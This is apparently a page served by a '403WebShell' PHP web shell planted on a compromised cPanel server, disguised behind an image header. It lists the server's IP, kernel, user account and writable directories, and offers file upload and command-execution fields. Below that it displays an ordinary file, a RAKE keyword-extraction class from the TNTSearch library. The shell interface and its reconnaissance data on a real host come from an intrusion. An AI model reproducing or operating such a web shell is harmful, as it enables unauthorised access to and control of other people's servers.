����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 216.73.216.178
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/builderbox/public_html/vendor/teamtnt/tntsearch/src/KeywordExtraction/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/builderbox/public_html/vendor/teamtnt/tntsearch/src/KeywordExtraction/Rake.php
<?php

namespace TeamTNT\TNTSearch\KeywordExtraction;

/**
 * RAKE-style keyword extractor.
 *
 * The text is tokenized, split into candidate phrases at stopwords and
 * punctuation, every word is scored as degree / frequency, and every phrase
 * is scored as the sum of its word scores.
 */
class Rake
{
    /**
     * Stopwords that delimit candidate phrases.
     *
     * Kept public because the property used to be created dynamically in the
     * constructor and was therefore publicly accessible.
     *
     * @var array
     */
    public $stopwords = [];

    /**
     * Loads the stopword list for the given language.
     *
     * The list is read from "../Stopwords/<language>.json" relative to this
     * file. When the file cannot be read or does not decode to a JSON array,
     * the extractor falls back to an empty stopword list instead of storing
     * a non-array value that would break in_array() later on.
     *
     * @param string $language Base name of the stopword file (without ".json").
     */
    public function __construct($language = "english")
    {
        $stopwords = file_get_contents(__DIR__."/../Stopwords/".$language.".json");
        $decoded   = $stopwords === false ? null : json_decode($stopwords);

        $this->stopwords = is_array($decoded) ? $decoded : [];
    }

    /**
     * Extracts the highest scoring candidate phrases from a text.
     *
     * Only the best ceil(n / 3) + 1 of the n distinct phrases are returned,
     * ordered by descending score.
     *
     * @param string $text          Text to analyse.
     * @param bool   $includeScores When true, return phrase => score pairs;
     *                              otherwise return only the phrases.
     *
     * @return array
     */
    public function extractKeywords($text, $includeScores = true)
    {
        $phraseList   = $this->generateCandidateKeywords($text);
        $wordScores   = $this->calculateWordScores($phraseList);
        $phraseScores = $this->calculatePhraseScores($phraseList, $wordScores);

        arsort($phraseScores);

        // ceil() yields a float; array_slice() expects an integer length.
        $oneThird = (int) ceil(count($phraseScores) / 3) + 1;

        $phraseScores = array_slice($phraseScores, 0, $oneThird);
        if ($includeScores) {
            return $phraseScores;
        }
        return array_keys($phraseScores);
    }

    /**
     * Splits a text into candidate phrases.
     *
     * Stopwords and punctuation tokens act as delimiters and are dropped;
     * each run of tokens between two delimiters becomes one phrase.
     *
     * @param string $text Text to analyse.
     *
     * @return array List of phrases, each phrase being a list of words.
     */
    public function generateCandidateKeywords($text)
    {
        $phraseList = [];
        $phrase     = [];

        foreach ($this->tokenize($text) as $word) {
            // Strict comparison: tokens are strings, and loose comparison
            // would make distinct numeric strings ("10" / "1e1") match.
            $isDelimiter = in_array($word, $this->stopwords, true) || $this->isPunctuation($word);

            if (!$isDelimiter) {
                $phrase[] = $word;
                continue;
            }

            if (count($phrase) > 0) {
                $phraseList[] = $phrase;
                $phrase       = [];
            }
        }

        // Flush the phrase that runs up to the end of the text.
        if (count($phrase) > 0) {
            $phraseList[] = $phrase;
        }

        return $phraseList;
    }

    /**
     * Scores every phrase as the sum of the scores of its words.
     *
     * Phrases are keyed by their words joined with a single space, so a
     * phrase that occurs several times yields one entry.
     *
     * @param array $phraseList List of phrases (lists of words).
     * @param array $wordScores Map of word => score; expected to contain an
     *                          entry for every word in $phraseList.
     *
     * @return array Map of phrase string => score.
     */
    public function calculatePhraseScores($phraseList, $wordScores)
    {
        $result = [];

        foreach ($phraseList as $phrase) {
            $wordScore = 0;

            foreach ($phrase as $word) {
                $wordScore += $wordScores[$word];
            }

            $result[implode(" ", $phrase)] = $wordScore;
        }

        return $result;
    }

    /**
     * Scores every word as degree / frequency.
     *
     * Degree and frequency are accumulated in one pass over the phrase list
     * rather than rescanning the whole list for each word occurrence; the
     * definitions match wordDegree() and wordFrequency().
     *
     * @param array $phraseList List of phrases (lists of words).
     *
     * @return array Map of word => score, in order of first occurrence.
     */
    public function calculateWordScores($phraseList)
    {
        $degrees     = [];
        $frequencies = [];

        foreach ($phraseList as $phrase) {
            $phraseLength = count($phrase);

            foreach ($phrase as $word) {
                if (!isset($frequencies[$word])) {
                    $degrees[$word]     = 0;
                    $frequencies[$word] = 0;
                }

                $degrees[$word] += $phraseLength;
                $frequencies[$word]++;
            }
        }

        $result = [];
        foreach ($degrees as $word => $degree) {
            $result[$word] = $degree / $frequencies[$word];
        }

        return $result;
    }

    /**
     * Sums the lengths of the phrases containing a word, once per occurrence.
     *
     * @param string $word       Word to look up.
     * @param array  $phraseList List of phrases (lists of words).
     *
     * @return int
     */
    public function wordDegree($word, $phraseList)
    {
        $needle = (string) $word;
        $count  = 0;

        foreach ($phraseList as $phrase) {
            foreach ($phrase as $p) {
                // Compare as strings so numeric-looking tokens such as "10"
                // and "1e1" are not treated as the same word.
                if ((string) $p === $needle) {
                    $count += count($phrase);
                }
            }
        }
        return $count;
    }

    /**
     * Counts the occurrences of a word across all phrases.
     *
     * @param string $word       Word to look up.
     * @param array  $phraseList List of phrases (lists of words).
     *
     * @return int
     */
    public function wordFrequency($word, $phraseList)
    {
        $needle = (string) $word;
        $count  = 0;

        foreach ($phraseList as $phrase) {
            foreach ($phrase as $p) {
                // String comparison, for the same reason as in wordDegree().
                if ((string) $p === $needle) {
                    $count++;
                }
            }
        }
        return $count;
    }

    /**
     * Joins the words of every phrase with a single space.
     *
     * The misspelt method name is part of the public interface and is kept
     * as is.
     *
     * @param array $phraseList List of phrases (lists of words).
     *
     * @return array List of phrase strings.
     */
    public function returnFormatedPharaseList($phraseList)
    {
        $formatedList = [];
        foreach ($phraseList as $phrase) {
            $formatedList[] = implode(" ", $phrase);
        }
        return $formatedList;
    }

    /**
     * Lowercases a string and splits it into word and punctuation tokens.
     *
     * Separators and "other" characters (control characters etc.) are
     * dropped; each punctuation character becomes a token of its own.
     *
     * @param string $str Text to tokenize; treated as UTF-8.
     *
     * @return array List of tokens; empty when the pattern cannot be applied.
     */
    public function tokenize($str)
    {
        // The pattern below runs in UTF-8 mode, so lowercase as UTF-8 too
        // instead of relying on the configured internal encoding.
        $str = mb_strtolower($str, 'UTF-8');

        $arr = [];
        // for the character classes
        // see http://php.net/manual/en/regexp.reference.unicode.php
        $pat = '/
                    ([\pZ\pC]*)         # match any separator or other
                                        # in sequence
                    (
                        [^\pP\pZ\pC]+ | # match a sequence of characters
                                        # that are not punctuation,
                                        # separator or other
                        .               # match punctuations one by one
                    )
                    ([\pZ\pC]*)         # match a sequence of separators
                                        # that follows
                /xu';

        // preg_match_all() returns false on failure (e.g. malformed UTF-8).
        if (preg_match_all($pat, $str, $arr) === false || !isset($arr[2])) {
            return [];
        }

        return $arr[2];
    }

    /**
     * Tells whether a token consists solely of punctuation.
     *
     * ctype_punct() only knows ASCII, while tokenize() also emits Unicode
     * punctuation (dashes, curly quotes, ...) as separate tokens, so those
     * are checked through the \pP character property.
     *
     * @param string $word Token to test.
     *
     * @return bool
     */
    private function isPunctuation($word)
    {
        $word = (string) $word;

        return ctype_punct($word) || preg_match('/\A\pP+\z/u', $word) === 1;
    }

}

Youez - 2016 - github.com/yon3zu
LinuXploit